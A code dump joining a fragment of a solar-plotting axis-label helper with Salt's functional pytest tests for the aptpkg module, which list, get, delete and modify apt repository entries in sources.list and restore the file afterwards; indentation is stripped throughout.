def show_figure(*args, **kwargs):
_ = func(*args, **kwargs)
plt.show()
return show_figure
def axis_labels_from_ctype(ctype, unit):
"""
Returns axis labels for the given coordinate type and unit.
Parameters
----------
ctype: `str`
Coordinate type.
unit: `str`, `None`
Required unit. If `None` no unit is added to the label.
Returns
-------
`str`
"Axis Label [Unit]"
"""
ctype_short = ctype[:4]
labels = {'HGLN': 'Heliographic Longitude',
          'CRLN': 'Carrington Longitude',
          'HPLN': 'Helioprojective Longitude (Solar-X)',
          'SOLX': 'Heliocentric X',
          'HGLT': 'Latitude',
          'CRLT': 'Latitude',
          'HPLT': 'Helioprojective Latitude (Solar-Y)',
          'SOLY': 'Heliocentric Y'}
label = labels.get(ctype_short, str(ctype))
if unit is not None:
label += f' [{unit}]'
return label
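# Illustrative usage (editorial, derived directly from the mapping above):
#   >>> axis_labels_from_ctype("HPLN-TAN", "arcsec")
#   'Helioprojective Longitude (Solar-X) [arcsec]'
#   >>> axis_labels_from_ctype("HGLT-CAR", None)
#   'Latitude'
#   >>> axis_labels_from_ctype("WAVE", "nm")   # unknown ctypes fall through as-is
#   'WAVE [nm]'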
|
tests/pytests/functional/modules/test_aptpkg.py
|
tomdoherty/salt
| 9,425 |
85875
|
<reponame>tomdoherty/salt<filename>tests/pytests/functional/modules/test_aptpkg.py
import pathlib
import shutil
import pytest
import salt.exceptions
import salt.modules.aptpkg as aptpkg
import salt.modules.cmdmod as cmd
import salt.modules.file as file
import salt.utils.files
import salt.utils.stringutils
from tests.support.mock import Mock, patch
pytestmark = [
pytest.mark.skip_if_binaries_missing("apt-cache", "grep"),
]
@pytest.fixture
def configure_loader_modules(minion_opts):
return {
aptpkg: {
"__salt__": {
"cmd.run_all": cmd.run_all,
"cmd.run": cmd.run,
"file.replace": file.replace,
"file.append": file.append,
"file.grep": file.grep,
},
"__opts__": minion_opts,
},
file: {
"__salt__": {"cmd.run_all": cmd.run_all},
"__utils__": {
"files.is_text": salt.utils.files.is_text,
"stringutils.get_diff": salt.utils.stringutils.get_diff,
},
"__opts__": minion_opts,
},
}
@pytest.fixture()
def revert_repo_file(tmp_path):
try:
repo_file = pathlib.Path("/etc") / "apt" / "sources.list"
backup = tmp_path / "repo_backup"
# make copy of repo file
shutil.copy(str(repo_file), str(backup))
yield
finally:
# revert repo file
shutil.copy(str(backup), str(repo_file))
aptpkg.refresh_db()
def get_current_repo(multiple_comps=False):
"""
Get a repo currently in sources.list
multiple_comps:
Search for a repo that contains multiple comps.
For example: main, restricted
"""
with salt.utils.files.fopen("/etc/apt/sources.list") as fp:
for line in fp:
if line.startswith("#"):
continue
if "ubuntu.com" in line or "debian.org" in line:
test_repo = line.strip()
comps = test_repo.split()[3:]
if multiple_comps:
if len(comps) > 1:
break
else:
break
return test_repo, comps
def test_list_repos():
"""
Test aptpkg.list_repos
"""
ret = aptpkg.list_repos()
repos = [x for x in ret if "http" in x]
for repo in repos:
check_repo = ret[repo][0]
for key in [
"comps",
"dist",
"uri",
"line",
"architectures",
"file",
"type",
]:
assert key in check_repo
assert pathlib.Path(check_repo["file"]).is_file()
assert check_repo["dist"] in check_repo["line"]
if isinstance(check_repo["comps"], list):
assert " ".join(check_repo["comps"]) in check_repo["line"]
else:
assert check_repo["comps"] in check_repo["line"]
def test_get_repos():
"""
Test aptpkg.get_repos
"""
test_repo, comps = get_current_repo()
if not test_repo:
pytest.skip("Did not detect an apt repo")
exp_ret = test_repo.split()
ret = aptpkg.get_repo(repo=test_repo)
assert ret["type"] == exp_ret[0]
assert ret["uri"] == exp_ret[1]
assert ret["dist"] == exp_ret[2]
assert ret["comps"] == exp_ret[3:]
assert ret["file"] == "/etc/apt/sources.list"
def test_get_repos_multiple_comps():
"""
Test aptpkg.get_repos when multiple comps
exist in repo.
"""
test_repo, comps = get_current_repo(multiple_comps=True)
if not test_repo:
pytest.skip("Did not detect an ubuntu repo")
exp_ret = test_repo.split()
ret = aptpkg.get_repo(repo=test_repo)
assert ret["type"] == exp_ret[0]
assert ret["uri"] == exp_ret[1]
assert ret["dist"] == exp_ret[2]
assert ret["comps"] == exp_ret[3:]
def test_get_repos_doesnot_exist():
"""
Test aptpkg.get_repos when passing a repo
that does not exist
"""
for test_repo in [
"doesnotexist",
"deb http://archive.ubuntu.com/ubuntu/ focal-backports compdoesnotexist",
]:
ret = aptpkg.get_repo(repo=test_repo)
assert not ret
@pytest.mark.destructive_test
def test_del_repo(revert_repo_file):
"""
Test aptpkg.del_repo when passing repo
that exists. And checking correct error
is returned when it no longer exists.
"""
test_repo, comps = get_current_repo()
ret = aptpkg.del_repo(repo=test_repo)
assert "Repo '{}' has been removed".format(test_repo) in ret
with pytest.raises(salt.exceptions.CommandExecutionError) as exc:
ret = aptpkg.del_repo(repo=test_repo)
assert "Repo {} doesn't exist".format(test_repo) in exc.value.message
def test_expand_repo_def():
"""
Test aptpkg.expand_repo_def when the repo exists.
"""
test_repo, comps = get_current_repo()
ret = aptpkg.expand_repo_def(repo=test_repo)
for key in [
"comps",
"dist",
"uri",
"line",
"architectures",
"file",
"type",
]:
assert key in ret
assert pathlib.Path(ret["file"]).is_file()
assert ret["dist"] in ret["line"]
if isinstance(ret["comps"], list):
for comp in ret["comps"]:
assert comp in ret["line"]
else:
assert ret["comps"] in ret["line"]
@pytest.mark.destructive_test
def test_mod_repo(revert_repo_file):
"""
Test aptpkg.mod_repo when the repo exists.
"""
test_repo, comps = get_current_repo()
msg = "This is a test"
with patch.dict(aptpkg.__salt__, {"config.option": Mock()}):
ret = aptpkg.mod_repo(repo=test_repo, comments=msg)
assert sorted(ret[list(ret.keys())[0]]["comps"]) == sorted(comps)
ret = file.grep("/etc/apt/sources.list", msg)
assert "#{}".format(msg) in ret["stdout"]
@pytest.mark.destructive_test
def test_mod_repo_no_file(tmp_path, revert_repo_file):
"""
Test aptpkg.mod_repo when the file does not exist.
It should create the file.
"""
test_repo, comps = get_current_repo()
test_file = str(tmp_path / "test_repo")
with patch.dict(aptpkg.__salt__, {"config.option": Mock()}):
ret = aptpkg.mod_repo(repo=test_repo, file=test_file)
with salt.utils.files.fopen(test_file, "r") as fp:
ret = fp.read()
assert test_repo.split()[1] in ret.strip()
for comp in comps:
assert comp in ret
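# Editorial smoke check (not part of the salt suite): it only exercises the
# helper defined above and assumes a Debian/Ubuntu style /etc/apt/sources.list
# is present on the local machine.
if __name__ == "__main__":
    smoke_repo, smoke_comps = get_current_repo()
    print("detected repo:", smoke_repo)
    print("components:", smoke_comps)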
|